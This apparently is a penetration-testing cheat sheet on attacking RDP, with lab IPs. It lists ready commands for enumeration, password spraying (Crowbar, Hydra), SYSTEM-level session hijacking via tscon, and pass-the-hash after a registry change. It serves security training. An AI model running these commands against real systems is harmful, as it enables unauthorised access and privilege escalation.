Attacking RDP
RDP (Remote Desktop Protocol) is Microsoft’s proprietary protocol for remote graphical access over TCP/3389.
Enumeration
nmap -Pn -p3389 192.168.2.143
Password Attacks
Password Spraying
Use password spraying to avoid account lockouts (one password against many users).
Crowbar:
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Hydra:
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
RDP Login
rdesktop -u admin -p password123 192.168.2.143
# or
xfreerdp /v:192.168.2.143 /u:admin /p:password123
RDP Session Hijacking
Hijack another user’s RDP session to escalate privileges. Requires local admin (to get SYSTEM).
-
List sessions:
query user -
Create a service to run tscon as SYSTEM:
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <TARGET_SESSION_ID> /dest:<YOUR_SESSION_NAME>" net start sessionhijack
Note: This method no longer works on Server 2019.
RDP Pass-the-Hash
Use an NT hash instead of a plaintext password. Requires Restricted Admin Mode enabled on target.
Enable Restricted Admin Mode:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Connect with hash:
xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9